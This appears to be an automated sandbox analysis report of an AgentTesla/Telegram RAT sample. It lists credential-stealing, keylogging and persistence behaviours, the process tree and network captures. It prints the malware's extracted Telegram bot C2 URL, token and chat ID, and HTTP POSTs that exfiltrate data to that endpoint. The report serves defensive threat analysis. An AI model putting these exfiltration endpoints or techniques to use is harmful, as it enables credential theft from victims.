Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
izwFjkhFJm.exe

Overview

General Information

Sample Name:izwFjkhFJm.exe
Original Sample Name:ae2a3b41292c66a9dd6f10c874c05293.exe
Analysis ID:830846
MD5:ae2a3b41292c66a9dd6f10c874c05293
SHA1:caa30701c5487c2aecfb9b35b1d0e9ea6f3214b6
SHA256:65cc1ea27c733c270dd0497ed9c99896baf50eeafa5e1200889557985bfd87d5
Tags:AgentTeslaexeTelegram
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected AgentTesla
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Creates multiple autostart registry keys
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Encrypted powershell cmdline option found
Uses the Telegram API (likely for C&C communication)
Contains functionality to register a low level keyboard hook
Machine Learning detection for sample
May check the online IP address of the machine
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Machine Learning detection for dropped file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Uses a known web browser user agent for HTTP communication
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • izwFjkhFJm.exe (PID: 324 cmdline: C:\Users\user\Desktop\izwFjkhFJm.exe MD5: AE2A3B41292C66A9DD6F10C874C05293)
    • powershell.exe (PID: 6076 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • izwFjkhFJm.exe (PID: 1784 cmdline: C:\Users\user\Desktop\izwFjkhFJm.exe MD5: AE2A3B41292C66A9DD6F10C874C05293)
    • izwFjkhFJm.exe (PID: 2108 cmdline: C:\Users\user\Desktop\izwFjkhFJm.exe MD5: AE2A3B41292C66A9DD6F10C874C05293)
    • izwFjkhFJm.exe (PID: 2312 cmdline: C:\Users\user\Desktop\izwFjkhFJm.exe MD5: AE2A3B41292C66A9DD6F10C874C05293)
    • izwFjkhFJm.exe (PID: 2948 cmdline: C:\Users\user\Desktop\izwFjkhFJm.exe MD5: AE2A3B41292C66A9DD6F10C874C05293)
  • Oefdyik.exe (PID: 5104 cmdline: "C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe" MD5: AE2A3B41292C66A9DD6F10C874C05293)
    • powershell.exe (PID: 5292 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Oefdyik.exe (PID: 5344 cmdline: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe MD5: AE2A3B41292C66A9DD6F10C874C05293)
    • Oefdyik.exe (PID: 6036 cmdline: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe MD5: AE2A3B41292C66A9DD6F10C874C05293)
  • kDPmkTm.exe (PID: 1952 cmdline: "C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe" MD5: AE2A3B41292C66A9DD6F10C874C05293)
    • powershell.exe (PID: 4852 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • Oefdyik.exe (PID: 4700 cmdline: "C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe" MD5: AE2A3B41292C66A9DD6F10C874C05293)
    • powershell.exe (PID: 5444 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • kDPmkTm.exe (PID: 6084 cmdline: "C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe" MD5: AE2A3B41292C66A9DD6F10C874C05293)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based keylogger and RAT readily available to actors. Logs keystrokes and the host's clipboard and beacons this information back to the C2.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendMessage?chat_id=6169364705"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001B.00000002.534154582.0000000002F7F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000000F.00000002.530484456.0000000003248000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      0000000F.00000002.530484456.0000000003248000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.336146048.0000000005440000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          Process Memory Space: izwFjkhFJm.exe PID: 2948JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.izwFjkhFJm.exe.5440000.4.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Snort Signatures

              Timestamp:192.168.2.3149.154.167.220497154432851779 03/20/23-18:33:24.869717
              SID:2851779
              Source Port:49715
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3149.154.167.220497014432851779 03/20/23-18:31:36.462231
              SID:2851779
              Source Port:49701
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: izwFjkhFJm.exeReversingLabs: Detection: 33%
              Source: izwFjkhFJm.exeVirustotal: Detection: 52%Perma Link
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeVirustotal: Detection: 52%Perma Link
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeReversingLabs: Detection: 33%
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeReversingLabs: Detection: 33%
              Machine Learning detection for sample
              Source: izwFjkhFJm.exeJoe Sandbox ML: detected
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeJoe Sandbox ML: detected
              Source: 0.2.izwFjkhFJm.exe.38b9d00.2.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendMessage?chat_id=6169364705"}
              Source: Oefdyik.exe.6036.27.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendMessage"}
              Source: izwFjkhFJm.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.3:49699 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49701 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.3:49702 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.3:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49715 version: TLS 1.2
              Source: izwFjkhFJm.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.000000000463A000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.000000000463A000.00000004.00000800.00020000.00000000.sdmp

              Networking

              barindex
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49701 -> 149.154.167.220:443
              Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49715 -> 149.154.167.220:443
              Uses the Telegram API (likely for C&C communication)
              Source: unknownDNS query: name: api.telegram.org
              Source: unknownDNS query: name: api.telegram.org
              May check the online IP address of the machine
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeDNS query: name: api.ipify.org
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeDNS query: name: api.ipify.org
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeDNS query: name: api.ipify.org
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeDNS query: name: api.ipify.org
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeDNS query: name: api.ipify.org
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeDNS query: name: api.ipify.org
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeDNS query: name: api.ipify.org
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeDNS query: name: api.ipify.org
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeDNS query: name: api.ipify.org
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeDNS query: name: api.ipify.org
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeDNS query: name: api.ipify.org
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeDNS query: name: api.ipify.org
              Source: unknownDNS query: name: api.ipify.org
              Source: unknownDNS query: name: api.ipify.org
              Source: unknownDNS query: name: api.ipify.org
              Source: unknownDNS query: name: api.ipify.org
              Source: unknownDNS query: name: api.ipify.org
              Source: unknownDNS query: name: api.ipify.org
              Yara detected Generic Downloader
              Source: Yara matchFile source: 0.2.izwFjkhFJm.exe.5440000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.336146048.0000000005440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: global trafficHTTP traffic detected: POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8db29c7c3cbde5fHost: api.telegram.orgContent-Length: 972Expect: 100-continueConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8db297197376642Host: api.telegram.orgContent-Length: 972Expect: 100-continueConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: Joe Sandbox ViewIP Address: 173.231.16.76 173.231.16.76
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
              Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
              Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
              Source: izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/
              Source: izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.525853028.0000000003573000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.524877203.0000000003393000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCert
              Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046DD000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7D000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000489C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.00000000049DB000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
              Source: kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrusted
              Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000489C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046DD000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7D000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000489C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: Oefdyik.exe, 00000012.00000002.540877039.0000000004A7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.c
              Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.00000000049DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
              Source: izwFjkhFJm.exe, 0000000F.00000003.344564244.0000000001519000.00000004.00000020.00020000.00000000.sdmp, Oefdyik.exe, 0000001B.00000002.519934856.00000000011B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/
              Source: izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.525853028.0000000003573000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.524877203.0000000003393000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCert
              Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046DD000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7D000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000489C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.00000000049DB000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
              Source: kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrusted
              Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000489C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046DD000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7D000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000489C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.00000000049DB000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
              Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.00000000049DB000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
              Source: Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.000000000462D000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047F5000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000488D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
              Source: izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046DD000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7D000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000489C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
